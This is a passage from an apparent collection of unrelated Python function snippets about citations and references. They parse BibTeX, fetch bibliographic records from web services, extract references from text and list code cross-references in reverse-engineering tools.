refNodes]\n return fileRefs", "def fetchReferences(self, dataRef, exposure):\n skyMap = dataRef.get(self.dataPrefix + \"skyMap\", immediate=True)\n tractInfo = skyMap[dataRef.dataId[\"tract\"]]\n patch = tuple(int(v) for v in dataRef.dataId[\"patch\"].split(\",\"))\n patchInfo = tractInfo.getPatchInfo(patch)\n references = lsst.afw.table.SourceCatalog(self.references.schema)\n references.extend(self.references.fetchInPatches(dataRef, patchList=[patchInfo]))\n return references", "def list_defect_refs(self):\n print('-----------\\nDEFECT_REFs\\n-----------')\n self._print_dict(self.defect_refs)", "def getListOfReferenceGlyphs(self, *args):\n return _libsbml.GeneralGlyph_getListOfReferenceGlyphs(self, *args)", "def get_references(self):\n return self._references", "def _refs(self, items):\n # type: (Iterable[Any]) -> Iterable[weakref.ReferenceType]\n return map(self.ref, items)", "def run(self):\n env = 
cast(\"BuildEnvironment\", self.state.document.settings.env)\n foot_old_refs = env.temp_data.setdefault(\"bibtex_foot_old_refs\", set())\n foot_new_refs = env.temp_data.setdefault(\"bibtex_foot_new_refs\", set())\n footbibliography_count = env.temp_data[\"bibtex_footbibliography_count\"] = (\n env.temp_data.get(\"bibtex_footbibliography_count\", 0) + 1\n )\n if not foot_new_refs:\n return []\n else:\n foot_old_refs |= foot_new_refs\n foot_new_refs.clear()\n # bibliography stored in env.temp_data[\"bibtex_foot_bibliography\"]\n foot_domain = cast(\"BibtexFootDomain\", env.get_domain(\"footcite\"))\n foot_bibliography, env.temp_data[\"bibtex_foot_bibliography\"] = (\n env.temp_data[\"bibtex_foot_bibliography\"],\n foot_domain.bibliography_header.deepcopy(),\n )\n domain = cast(\"BibtexDomain\", env.get_domain(\"cite\"))\n for bibfile in domain.bibdata.bibfiles:\n env.note_dependency(bibfile)\n foot_bibliography[\"ids\"] += _make_ids(\n docname=env.docname,\n lineno=self.lineno,\n ids=set(self.state.document.ids.keys()),\n raw_id=env.app.config.bibtex_footbibliography_id.format(\n footbibliography_count=footbibliography_count\n ),\n )\n self.state.document.note_explicit_target(\n foot_bibliography, foot_bibliography\n )\n return [foot_bibliography]", "def references(self):\n return tuple(self.__references)", "def list_refs(self):\n print('----\\nREFs\\n----')\n self._print_dict(self.refs)", "def get_refs(*args, **kwargs):\n return get_refs_async(*args, **kwargs).get_result()", "def extract_references(text):\n open = u\"\\u201C\"\n close = u\"\\u201D\"\n undir_quote_strs = re.findall(r'\\\"(.+?)\\\"',text.decode('UTF-8', errors = 'replace'))\n dir_quote_strs=re.findall(r''+open+'(.+?)'+close+'',text.decode('UTF-8',errors='replace'))\n if len(undir_quote_strs) > len(dir_quote_strs):\n return undir_quote_strs #Some documents use undirected quotes\n return dir_quote_strs # Some documents use directed quotes", "def list_defect_ref_keys(self):\n print('=======')\n print('DEFECT_REFs')\n print('=======')\n for key in self.defect_refs:\n print(key)", "def getReferencesTo(self, address: ghidra.program.model.address.Address) -> List[ghidra.program.model.symbol.Reference]:\n ...", "def RawRefs(self, default=[{}]):\n tmp = self.data.get('raw_refs', default)\n return [HEP.RawReferenceObject(i) for i in tmp]", "def find_reference_files():\n for root, _, files in os.walk(\"./tests/references/\"):\n for basename in fnmatch.filter(files, \"*.tex\"):\n yield os.path.join(root, basename)", "def getRefs(self, text):\n pattern = re.compile(r'(?:(?<=^)|(?<=\\s))\\[(.+)\\]((?:http(?:s?):\\/\\/|\\/)\\S+)(?=\\s|$)',\n re.U)\n text = pattern.sub(self.refs, text)\n return text", "def add_ref(doc_name, bib_name, keep_label=False, slides=False):\n bib_path = bib_name # os.path.join(static_path, \"tex\", bib_name)\n if not slides:\n keep_label = True\n with open(doc_name, \"r\") as f:\n _file = f.read()\n # find citations\n match = re.findall(r\"\\[@.*?\\]\", _file)\n references = []\n # print(match)\n for cit in match:\n tmp_cite_html = tempfile.NamedTemporaryFile(suffix=\".html\", delete=True)\n tmp = tempfile.NamedTemporaryFile(suffix=\".md\", delete=True)\n with open(tmp.name, \"w\") as md_file:\n # Open the file for writing.\n md_file.write(cit)\n\n pandoc_command = [\n \"pandoc\",\n \"-C\",\n tmp.name,\n \"--bibliography\",\n bib_path,\n \"--csl\",\n \"./templates/my-csl.csl\",\n \"-o\",\n tmp_cite_html.name,\n ]\n if not slides:\n for tag in [\"--metadata\", \"link-citations=true\"]:\n pandoc_command.append(tag)\n 
output = subprocess.check_output(\n pandoc_command, stderr=subprocess.STDOUT\n ).decode(\"utf-8\")\n print(output.rstrip())\n tmp.close()\n with open(tmp_cite_html.name, \"r\") as cite_html:\n # Open the file for writing.\n cit_new = cite_html.read()\n # print(cit_new)\n if not keep_label:\n # remove first line\n cit_new = \"\\n\".join(cit_new.splitlines()[1:])\n else:\n lines = cit_new.splitlines()\n # remove the <p> tags\n lines[0] = lines[0][3:-4]\n cit_new = \"\\n\".join(lines)\n if slides:\n _file = _file.replace(cit, cit_new)\n else:\n _file = _file.replace(cit, lines[0])\n # collect the references\n references.append(\"<p>\")\n references.append(\"\\n\".join(lines))\n references.append(\"</p>\")\n # paste_refs_end()\n tmp_cite_html.close()\n if slides:\n with open(doc_name, \"w\") as f:\n f.write(_file)\n if not slides:\n if references == []:\n _file=clean_html_refs(_file)\n else:\n _file = _file.replace(\"<bibliography-placeholder>\", \"\\n\".join(references))\n with open(doc_name, \"w\") as f:\n f.write(_file)\n return", "def get_refs(self): \n for row in self._get_references_node():\n yield row.fetch_all_fields()", "def fetch_citylink_refs(self):\n tree = html.fromstring(self.fetch_manifest())\n self_refs = tree.xpath('//table/tr/td/table/tr[position()>4]/td[1]/text()')\n return [x.strip() for x in self_refs[:-1]]", "def retrieve(dbxrefs, basics=True, hierarchy=True, wikipedia=True, literature=True, cross_references=True, overlaps=True):\n resolved = dbxref.resolver.resolve(dbxrefs, check_existence=False)\n documents = []\n for entry in resolved:\n # Construct URL for retrieve\n json_url = entry['locations']['json'][0]\n logger.debug('URL: %s', json_url)\n r = requests.get(json_url)\n logger.debug('Content: %s', r.text)\n ipro = json.loads(r.text)\n\n # Parse retrieved json file by selected Options\n output = {\"id\": entry[\"dbxref\"]}\n if basics:\n try:\n output.update(accession=ipro[\"metadata\"][\"accession\"], entry_type=ipro[\"metadata\"][\"type\"],\n description=ipro[\"metadata\"][\"description\"], counters=ipro[\"metadata\"][\"counters\"],\n entry_id=ipro[\"metadata\"][\"entry_id\"], name=ipro[\"metadata\"][\"name\"],\n source_database=ipro[\"metadata\"][\"source_database\"])\n except KeyError:\n logger.warning(\"One or more basic information were not available for the given entry. 
Please check your output.\")\n if hierarchy:\n try:\n output.update(hierarchy=ipro[\"metadata\"][\"hierarchy\"])\n except KeyError:\n logger.warning(\"Hierarchy information was not available for the given entry.\")\n if wikipedia:\n try:\n output.update(wikipedia=ipro[\"metadata\"][\"wikipedia\"])\n except KeyError:\n logger.warning(\"Wikipedia articles were not available for the given entry.\")\n if literature:\n try:\n output.update(literature=ipro[\"metadata\"][\"literature\"])\n except KeyError:\n logger.warning(\"Literature was not available for the given entry.\")\n if cross_references:\n try:\n output.update(cross_references=ipro[\"metadata\"][\"cross_references\"])\n except KeyError:\n logger.warning(\"Cross_references were not available for the given entry.\")\n if overlaps:\n try:\n output.update(overlaps=ipro[\"metadata\"][\"overlaps_with\"])\n except KeyError:\n logger.warning(\"Overlap information was not available for the given entry.\")\n documents.append(output)\n return documents", "def _FindBibEntries(self):\n bibs = \" \".join(glob.glob(\"*.bib\"))\n cat_process = subprocess.Popen(shlex.split(\"cat %s\" % bibs),\n stdout=subprocess.PIPE)\n grep_process = subprocess.Popen(shlex.split(\"grep ^@\"),\n stdin=cat_process.stdout,\n stdout=subprocess.PIPE)\n cat_process.stdout.close()\n grep2_process = subprocess.Popen(shlex.split(\"grep -vi @string\"),\n stdin=grep_process.stdout,\n stdout=subprocess.PIPE)\n grep_process.stdout.close()\n\n lines = grep2_process.communicate()[0]\n\n ret = []\n for l in lines.split(\"\\n\"):\n ret.append(responses.BuildCompletionData(\n re.sub(r\"@([A-Za-z]*)\\s*{\\s*([^,]*),.*\", r\"\\2\", l)\n )\n )\n return ret", "def refs(self):\n return self._refs", "def to_cff_reference(bib_entry: pybtex.database.Entry) -> dict:\n\n def _cff_transform(cff_field, bib_value):\n if cff_field == \"type\":\n if bib_value == \"inproceedings\":\n return \"article\"\n elif bib_value == \"incollection\":\n return \"article\"\n elif cff_field == \"publisher\":\n return {\"name\": bib_value}\n elif cff_field == \"month\":\n try:\n return int(bib_value)\n except ValueError:\n return {\n \"jan\": 1,\n \"feb\": 2,\n \"mar\": 3,\n \"apr\": 4,\n \"may\": 5,\n \"jun\": 6,\n \"jul\": 7,\n \"aug\": 8,\n \"sep\": 9,\n \"oct\": 10,\n \"nov\": 11,\n \"dec\": 12,\n }[bib_value[:3].lower()]\n return bib_value\n\n cff_reference = {\n \"type\": _cff_transform(cff_field=\"type\", bib_value=bib_entry.type),\n \"authors\": [\n to_cff_person(person) for person in bib_entry.persons[\"author\"]\n ],\n }\n # Map BibTeX to CFF fields. 
This is just a subset of the most relevant\n # fields.\n fields = {\n \"doi\": \"doi\",\n \"edition\": \"edition\",\n \"isbn\": \"isbn\",\n \"license\": \"license\",\n \"month\": \"month\",\n \"number\": \"number\",\n \"pages\": \"pages\",\n \"publisher\": \"publisher\",\n \"title\": \"title\",\n \"url\": \"url\",\n \"version\": \"version\",\n \"volume\": \"volume\",\n \"year\": \"year\",\n \"booktitle\": \"collection-title\",\n }\n for bibtex_field, value in bib_entry.fields.items():\n bibtex_field = bibtex_field.lower()\n if bibtex_field in fields:\n cff_field = fields[bibtex_field]\n cff_reference[cff_field] = _cff_transform(\n cff_field=cff_field, bib_value=value\n )\n return cff_reference", "def getRefs( self, par, path ):\n\n return self.db.getRefsPar( par, path )", "def extract_references_from_txt(filename):\n file = open(filename)\n references_section = \"\"\n references_section_found = False\n for line in file:\n if \"REFERENCE\" in line:\n references_section_found = True\n if references_section_found:\n references_section+=line + \" \"\n references_section = references_section.replace('\\n','')\n refs = extract_references(references_section)\n return refs", "def getReferenceAnalyses(self):\n return [analysis for analysis in self.getAnalyses() \\\n if analysis.portal_type=='ReferenceAnalysis']", "def getXRefsTo(self):\r\n # type: () -> (list[int], list[int])\r\n crefs = []\r\n drefs = []\r\n # If the current address is function process it\r\n if idc.get_func_flags(self.func_ea) != -1:\r\n # Find all code references to func\r\n ref = idc.get_first_cref_to(self.func_ea)\r\n while ref != idaapi.BADADDR:\r\n # name = get_func_name(ref)\r\n # if not name: name = \"ROM:%08X\" % ref\r\n crefs.append(ref)\r\n ref = idaapi.get_next_cref_to(self.func_ea, ref)\r\n # Find all data references to func\r\n for ref in idautils.DataRefsTo(self.func_ea):\r\n drefs.append(ref)\r\n for ref in idautils.DataRefsTo(self.func_ea + 1):\r\n drefs.append(ref)\r\n\r\n return crefs, drefs", "def function_refs(self) -> List[FunctionReference]:\n return self._function_refs", "def list_all_refs(self):\n self.list_refs()\n self.list_ref0s()\n self.list_defect_refs()", "def get_crefs_from( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_from( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_from( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_from( ea, xrf )\r\n\treturn ret", "def process_and_dispatch(self):\n references = []\n for raw_block_references in self.raw_references:\n bibcode = raw_block_references['bibcode']\n block_references = raw_block_references['block_references']\n item_nums = raw_block_references.get('item_nums', [])\n\n parsed_references = []\n for i, reference in enumerate(block_references):\n reference = self.latex_reference.cleanup(reference)\n logger.debug(\"confTEX: parsing %s\" % reference)\n parsed_references.append(self.merge({'refstr': reference, 'refraw': reference}, self.any_item_num(item_nums, i)))\n\n references.append({'bibcode': bibcode, 'references': parsed_references})\n logger.debug(\"%s: parsed %d references\" % (bibcode, len(references)))\n\n return references", "def split_bibitems(bibliography):\n \n refs = []\n for filename, bib in bibliography.iteritems():\n split_ind = []\n for ind, item in enumerate(bib):\n if item.startswith(r\"\\bibitem\"):\n split_ind.append(ind)\n \n for ref in partition(bib, split_ind):\n if ref:\n refs.append(RefObj.RefObj(filename, refstr='\\n'.join(ref)))\n return refs", "def 
references(name, tag):\n\n gen_refs = \"\\n\".join([''.join([\"J. Bartels, The technique of scaling \",\n \"indices K and Q of geomagnetic activity, \",\n \"Ann. Intern. Geophys. Year 4, 215-226, \",\n \"1957.\"]),\n ''.join([\"J. Bartels,The geomagnetic measures for \",\n \"the time-variations of solar corpuscular \",\n \"radiation, described for use in \",\n \"correlation studies in other geophysical \",\n \"fields, Ann. Intern. Geophys. Year 4, \",\n \"227-236, 1957.\"]),\n ''.join([\"P.N. Mayaud, Derivation, Meaning and Use \",\n \"of Geomagnetic Indices, Geophysical \",\n \"Monograph 22, Am. Geophys. Union, \",\n \"Washington D.C., 1980.\"]),\n ''.join([\"G.K. Rangarajan, Indices of magnetic \",\n \"activity, in Geomagnetism, edited by I.A. \",\n \"Jacobs, Academic, San Diego, 1989.\"]),\n ''.join([\"M. Menvielle and A. Berthelier, The \",\n \"K-derived planetary indices: description \",\n \"and availability, Rev. Geophys. 29, 3, \",\n \"415-432, 1991.\"])])\n refs = {'kp': {'': gen_refs, 'forecast': gen_refs, 'recent': gen_refs}}\n\n return refs[name][tag]", "def process_bibliography(style, reference_list):\n processed_bibliography = Element(\"ol\", attrib={\"class\":\"bibliography\"})\n\n for reference in reference_list:\n ref = SubElement(processed_bibliography, \"li\", \n attrib={\"property\":\"dc:references\"})\n\n for style_node in style.bibliography.layout:\n process_node(ref, style_node, style.macros, reference) \n\n return(processed_bibliography)", "def getBibTeX(bibref,tag_suf,outFile):\n if bibref == '1988iras....1.....B':\n bibtex = ['>@article{1988iras....1.....B,\\n',\n ' title={Infrared astronomical satellite (IRAS) catalogs and atlases. Volume 1: Explanatory supplement},\\n',\n ' keywords = {All Sky Photography, Catalogs, Indexes (Documentation), Infrared Astronomy Satellite, Cosmology, Galaxies, Star Formation, Stellar Evolution, Astrophysics},\\n',\n ' author={Beichman, CA and Neugebauer, G and Habing, HJ and Clegg, PE and Chester, Thomas J},\\n',\n ' year=1988,\\n',\n ' volume = {1},\\n', \n ' month = jan,\\n', \n ' adsurl = {https://ui.adsabs.harvard.edu/abs/1988iras....1.....B},\\n'\n '}\\n']\n else:\n baseURL = 'https://ui.adsabs.harvard.edu/abs/'\n suf = '/exportcitation'\n lines = urllib.request.urlopen(baseURL+bibref+suf).readlines()\n lines = [l.decode('utf-8') for l in lines] # remove additional webpage encoding\n \n bibtex = []\n for l in range(0, len(lines)):\n if 'export-textarea ' in str(lines[l]):\n bibtex.append(str(lines[l]))\n t = l+1\n \n while '</textarea>' not in str(lines[t+1]):\n bibtex.append(str(lines[t])) \n t += 1\n \n for item in bibtex:\n if 'author' in item.split('=')[0]:\n auth = item.split('=')[1].split(',')[0]\n for i in string.punctuation:\n auth = auth.replace(i, '')\n auth = auth.replace(' ', '')\n if 'year' in item.split('=')[0]:\n yr = item.split('=')[1].split(',')[0]\n yr = yr.replace(' ', '')\n \n try:\n bibtex[0] = bibtex[0].split('>')[1].split('{')[0]+'{'+auth+yr+tag_suf+',\\n'\n except UnboundLocalError as ule:\n print(bibtex)\n print('')\n print(ule)\n sys.exit()\n \n with open(outFile, 'a') as o:\n for item in bibtex:\n item = item.replace('&#34;', '\"')\n item = item.replace('&#39;', \"'\")\n item = item.replace('&amp;', \"&\")\n o.write(item)\n o.write('\\n')\n \n return auth+yr+tag_suf", "def main(bib_fpath=None):\n\n if bib_fpath is None:\n bib_fpath = 'My Library.bib'\n\n # DEBUG = ub.argflag('--debug')\n # Read in text and ensure ascii format\n dirty_text = ut.readfrom(bib_fpath)\n\n from fixtex.fix_tex import 
find_used_citations, testdata_fpaths\n\n if exists('custom_extra.bib'):\n extra_parser = bparser.BibTexParser(ignore_nonstandard_types=False)\n parser = bparser.BibTexParser()\n ut.delete_keys(parser.alt_dict, ['url', 'urls'])\n print('Parsing extra bibtex file')\n extra_text = ut.readfrom('custom_extra.bib')\n extra_database = extra_parser.parse(extra_text, partial=False)\n print('Finished parsing extra')\n extra_dict = extra_database.get_entry_dict()\n else:\n extra_dict = None\n\n #udata = dirty_text.decode(\"utf-8\")\n #dirty_text = udata.encode(\"ascii\", \"ignore\")\n #dirty_text = udata\n\n # parser = bparser.BibTexParser()\n # bib_database = parser.parse(dirty_text)\n # d = bib_database.get_entry_dict()\n\n print('BIBTEXPARSER LOAD')\n parser = bparser.BibTexParser(ignore_nonstandard_types=False,\n common_strings=True)\n ut.delete_keys(parser.alt_dict, ['url', 'urls'])\n print('Parsing bibtex file')\n bib_database = parser.parse(dirty_text, partial=False)\n print('Finished parsing')\n\n bibtex_dict = bib_database.get_entry_dict()\n old_keys = list(bibtex_dict.keys())\n new_keys = []\n for key in ub.ProgIter(old_keys, label='fixing keys'):\n new_key = key\n new_key = new_key.replace(':', '')\n new_key = new_key.replace('-', '_')\n new_key = re.sub('__*', '_', new_key)\n new_keys.append(new_key)\n\n # assert len(ut.find_duplicate_items(new_keys)) == 0, 'new keys created conflict'\n assert len(ub.find_duplicates(new_keys)) == 0, 'new keys created conflict'\n\n for key, new_key in zip(old_keys, new_keys):\n if key != new_key:\n entry = bibtex_dict[key]\n entry['ID'] = new_key\n bibtex_dict[new_key] = entry\n del bibtex_dict[key]\n\n # The bibtext is now clean. Print it to stdout\n #print(clean_text)\n verbose = None\n if verbose is None:\n verbose = 1\n\n # Find citations from the tex documents\n key_list = None\n if key_list is None:\n cacher = ub.Cacher('texcite1', enabled=0)\n data = cacher.tryload()\n if data is None:\n fpaths = testdata_fpaths()\n key_list, inverse = find_used_citations(fpaths, return_inverse=True)\n # ignore = ['JP', '?', 'hendrick']\n # for item in ignore:\n # try:\n # key_list.remove(item)\n # except ValueError:\n # pass\n if verbose:\n print('Found %d citations used in the document' % (len(key_list),))\n data = key_list, inverse\n cacher.save(data)\n key_list, inverse = data\n\n # else:\n # key_list = None\n\n unknown_pubkeys = []\n debug_author = ub.argval('--debug-author', default=None)\n # ./fix_bib.py --debug_author=Kappes\n\n if verbose:\n print('Fixing %d/%d bibtex entries' % (len(key_list), len(bibtex_dict)))\n\n # debug = True\n debug = False\n if debug_author is not None:\n debug = False\n\n known_keys = list(bibtex_dict.keys())\n missing_keys = set(key_list) - set(known_keys)\n if extra_dict is not None:\n missing_keys.difference_update(set(extra_dict.keys()))\n\n if missing_keys:\n print('The library is missing keys found in tex files %s' % (\n ub.repr2(missing_keys),))\n\n # Search for possible typos:\n candidate_typos = {}\n sedlines = []\n for key in missing_keys:\n candidates = ut.closet_words(key, known_keys, num=3, subset=True)\n if len(candidates) > 1:\n top = candidates[0]\n if ut.edit_distance(key, top) == 1:\n # \"sed -i -e 's/{}/{}/g' *.tex\".format(key, top)\n import os\n replpaths = ' '.join([relpath(p, os.getcwd()) for p in inverse[key]])\n sedlines.append(\"sed -i -e 's/{}/{}/g' {}\".format(key, top, replpaths))\n candidate_typos[key] = candidates\n print('Cannot find key = %r' % (key,))\n print('Did you mean? 
%r' % (candidates,))\n\n print('Quick fixes')\n print('\\n'.join(sedlines))\n\n # group by file\n just = max([0] + list(map(len, missing_keys)))\n missing_fpaths = [inverse[key] for key in missing_keys]\n for fpath in sorted(set(ub.flatten(missing_fpaths))):\n # ut.fix_embed_globals()\n subkeys = [k for k in missing_keys if fpath in inverse[k]]\n print('')\n ut.cprint('--- Missing Keys ---', 'blue')\n ut.cprint('fpath = %r' % (fpath,), 'blue')\n ut.cprint('{} | {}'.format('Missing'.ljust(just), 'Did you mean?'), 'blue')\n for key in subkeys:\n print('{} | {}'.format(\n ut.highlight_text(key.ljust(just), 'red'),\n ' '.join(candidate_typos[key]))\n )\n\n # for key in list(bibtex_dict.keys()):\n\n if extra_dict is not None:\n # Extra database takes precidence over regular\n key_list = list(ut.unique(key_list + list(extra_dict.keys())))\n for k, v in extra_dict.items():\n bibtex_dict[k] = v\n\n full = ub.argflag('--full')\n\n for key in key_list:\n try:\n entry = bibtex_dict[key]\n except KeyError:\n continue\n self = BibTexCleaner(key, entry, full=full)\n\n if debug_author is not None:\n debug = debug_author in entry.get('author', '')\n\n if debug:\n ut.cprint(' --- ENTRY ---', 'yellow')\n print(ub.repr2(entry, nl=1))\n\n entry = self.fix()\n # self.clip_abstract()\n # self.shorten_keys()\n # self.fix_authors()\n # self.fix_year()\n # old_pubval = self.fix_pubkey()\n # if old_pubval:\n # unknown_pubkeys.append(old_pubval)\n # self.fix_arxiv()\n # self.fix_general()\n # self.fix_paper_types()\n\n if debug:\n print(ub.repr2(entry, nl=1))\n ut.cprint(' --- END ENTRY ---', 'yellow')\n bibtex_dict[key] = entry\n\n unwanted_keys = set(bibtex_dict.keys()) - set(key_list)\n if verbose:\n print('Removing unwanted %d entries' % (len(unwanted_keys)))\n ut.delete_dict_keys(bibtex_dict, unwanted_keys)\n\n if 0:\n d1 = bibtex_dict.copy()\n full = True\n for key, entry in d1.items():\n self = BibTexCleaner(key, entry, full=full)\n pub = self.publication()\n if pub is None:\n print(self.entry['ENTRYTYPE'])\n\n old = self.fix_pubkey()\n x1 = self._pubval()\n x2 = self.standard_pubval(full=full)\n # if x2 is not None and len(x2) > 5:\n # print(ub.repr2(self.entry))\n\n if x1 != x2:\n print('x2 = %r' % (x2,))\n print('x1 = %r' % (x1,))\n print(ub.repr2(self.entry))\n\n # if 'CVPR' in self.entry.get('booktitle', ''):\n # if 'CVPR' != self.entry.get('booktitle', ''):\n # break\n if old:\n print('old = %r' % (old,))\n d1[key] = self.entry\n\n if full:\n d1 = bibtex_dict.copy()\n\n import numpy as np\n import pandas as pd\n df = pd.DataFrame.from_dict(d1, orient='index')\n\n paged_items = df[~pd.isnull(df['pub_accro'])]\n has_pages = ~pd.isnull(paged_items['pages'])\n print('have pages {} / {}'.format(has_pages.sum(), len(has_pages)))\n print(ub.repr2(paged_items[~has_pages]['title'].values.tolist()))\n\n entrytypes = dict(list(df.groupby('pub_type')))\n if False:\n # entrytypes['misc']\n g = entrytypes['online']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n entrytypes['book']\n entrytypes['thesis']\n g = entrytypes['article']\n g = entrytypes['incollection']\n g = entrytypes['conference']\n\n def lookup_pub(e):\n if e == 'article':\n return 'journal', 'journal'\n elif e == 'incollection':\n return 'booksection', 'booktitle'\n elif e == 'conference':\n return 'conference', 'booktitle'\n return None, None\n\n for e, g in entrytypes.items():\n print('e = %r' % (e,))\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n if 'pub_full' in g.columns:\n place_title = g['pub_full'].tolist()\n 
print(ub.repr2(ub.dict_hist(place_title)))\n else:\n print('Unknown publications')\n\n if 'report' in entrytypes:\n g = entrytypes['report']\n missing = g[pd.isnull(g['title'])]\n if len(missing):\n print('Missing Title')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'journal' in entrytypes:\n g = entrytypes['journal']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['journal'])]\n if len(missing):\n print('Missing Journal')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'conference' in entrytypes:\n g = entrytypes['conference']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['booktitle'])]\n if len(missing):\n print('Missing Booktitle')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'incollection' in entrytypes:\n g = entrytypes['incollection']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n\n missing = g[pd.isnull(g['booktitle'])]\n if len(missing):\n print('Missing Booktitle')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n if 'thesis' in entrytypes:\n g = entrytypes['thesis']\n g = g[g.columns[~np.all(pd.isnull(g), axis=0)]]\n missing = g[pd.isnull(g['institution'])]\n if len(missing):\n print('Missing Institution')\n print(ub.repr2(missing[['title', 'author']].values.tolist()))\n\n # import utool\n # utool.embed()\n\n # Overwrite BibDatabase structure\n bib_database._entries_dict = bibtex_dict\n bib_database.entries = list(bibtex_dict.values())\n\n #conftitle_to_types_set_hist = {key: set(val) for key, val in conftitle_to_types_hist.items()}\n #print(ub.repr2(conftitle_to_types_set_hist))\n\n print('Unknown conference keys:')\n print(ub.repr2(sorted(unknown_pubkeys)))\n print('len(unknown_pubkeys) = %r' % (len(unknown_pubkeys),))\n\n writer = BibTexWriter()\n writer.contents = ['comments', 'entries']\n writer.indent = ' '\n writer.order_entries_by = ('type', 'author', 'year')\n\n new_bibtex_str = bibtexparser.dumps(bib_database, writer)\n\n # Need to check\n #jegou_aggregating_2012\n\n # Fix the Journal Abreviations\n # References:\n # https://www.ieee.org/documents/trans_journal_names.pdf\n\n # Write out clean bibfile in ascii format\n clean_bib_fpath = ub.augpath(bib_fpath.replace(' ', '_'), suffix='_clean')\n\n if not ub.argflag('--dryrun'):\n ut.writeto(clean_bib_fpath, new_bibtex_str)", "def construct_bibfile_data(*paths):\n bibs = [reffile_factory(path) for path in paths]\n return bibs", "def load_references(self, collections, item):", "def pdflookup(pdf, allresults, outformat):\n txt = convert_pdf_to_txt(pdf)\n # remove all non alphanumeric characters\n txt = re.sub(\"\\W\", \" \", txt)\n words = txt.strip().split()[:20]\n gsquery = \" \".join(words)\n bibtexlist = query(gsquery, outformat, allresults)\n return bibtexlist", "def get_crefs_to( ea ):\r\n\tret = []\r\n\txrf = get_first_cref_to( ea )\r\n\tif xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\txrf = get_next_cref_to( ea, xrf )\r\n\twhile xrf != BADADDR:\r\n\t\tret.append( xrf )\r\n\t\txrf = get_next_cref_to( ea, xrf )\r\n\treturn ret", "def get_all_refobjs(self, ):\n return cmds.ls(type=\"jb_reftrack\")", "def __get_references(self):\n named_references = []\n for usage in self.xml_cache.get_xml_tree(\"usagemodel\"):\n variable_usages = usage.findall(\".//namedReference__VariableUsage\")\n for name in variable_usages:\n named_references.append(name.get(\"referenceName\"))\n return named_references", "def bibtex(self) -> str:\n a = BibDatabase()\n a.entries = 
[self.bib]\n return bibtexparser.dumps(a)", "def parse_references(article):\n reference_list = []\n references = article.find(\"text\").find(\"div\", attrs={\"type\": \"references\"})\n references = references.find_all(\"biblstruct\") if references is not None else []\n reference_list = []\n for reference in references:\n title = reference.find(\"title\", attrs={\"level\": \"a\"})\n if title is None:\n title = reference.find(\"title\", attrs={\"level\": \"m\"})\n title = title.text if title is not None else \"\"\n journal = reference.find(\"title\", attrs={\"level\": \"j\"})\n journal = journal.text if journal is not None else \"\"\n if journal is \"\":\n journal = reference.find(\"publisher\")\n journal = journal.text if journal is not None else \"\"\n year = reference.find(\"date\")\n year = year.attrs.get(\"when\") if year is not None else \"\"\n authors = []\n for author in reference.find_all(\"author\"):\n firstname = author.find(\"forename\", {\"type\": \"first\"})\n firstname = firstname.text.strip() if firstname is not None else \"\"\n middlename = author.find(\"forename\", {\"type\": \"middle\"})\n middlename = middlename.text.strip() if middlename is not None else \"\"\n lastname = author.find(\"surname\")\n lastname = lastname.text.strip() if lastname is not None else \"\"\n if middlename is not \"\":\n authors.append(firstname + \" \" + middlename + \" \" + lastname)\n else:\n authors.append(firstname + \" \" + lastname)\n authors = \"; \".join(authors)\n reference_list.append(\n {\"title\": title, \"journal\": journal, \"year\": year, \"authors\": authors}\n )\n return reference_list", "def external_array_references(self):\n return self._to_ears(self.fileuris)", "def getreferences(self, pmcid, source):\n import requests\n r = requests.get(\n (self.referencesurl).format(source=source, pmcid=pmcid))\n return r.content", "def getReferencesFrom(self, address: ghidra.program.model.address.Address) -> List[ghidra.program.model.symbol.Reference]:\n ...", "def make_crossref_fundref(dataset: ObservatoryDataset) -> List[Dict]:\n\n records = []\n\n for funder in dataset.funders:\n records.append(\n {\n \"pre_label\": funder.name,\n \"funder\": f\"http://dx.doi.org/{funder.doi}\",\n \"country_code\": funder.country_code,\n \"region\": funder.region,\n \"funding_body_type\": funder.funding_body_type,\n \"funding_body_sub_type\": funder.funding_body_subtype,\n }\n )\n\n return records", "def _extract_core_biblio(self, bib):\n try:\n pubnumber = bib_scalar(bib, 'pubnumber')\n pubdate = datetime.strptime(bib_scalar(bib, 'pubdate'), '%Y%m%d')\n fam_raw = bib_scalar(bib, 'family_id')\n family_id = int(fam_raw) if fam_raw != None else fam_raw\n assign_applic_raw = bib.get('assign_applic')\n assign_applic = '|'.join(assign_applic_raw) if len(assign_applic_raw) > 0 else \"\"\n except KeyError, exc:\n raise RuntimeError(\"Document is missing mandatory biblio field (KeyError: {})\".format(exc))\n if len(pubnumber) == 0:\n raise RuntimeError(\"Document publication number field is empty\")\n\n return family_id, pubdate, pubnumber, assign_applic", "def make_bibtex(self):\n\n\t\t# bib = requests.request('GET', 'http://dx.doi.org/' + self.doi, ", "def get(self, *args):\n return _libsbml.ListOfSpeciesReferences_get(self, *args)", "def get(self, *args):\n return _libsbml.ListOfReferenceGlyphs_get(self, *args)", "def find_link_references(bytecode, full_reference_names):\n unprefixed_bytecode = remove_0x_prefix(bytecode)\n\n expand_fn = functools.partial(\n expand_shortened_reference_name,\n 
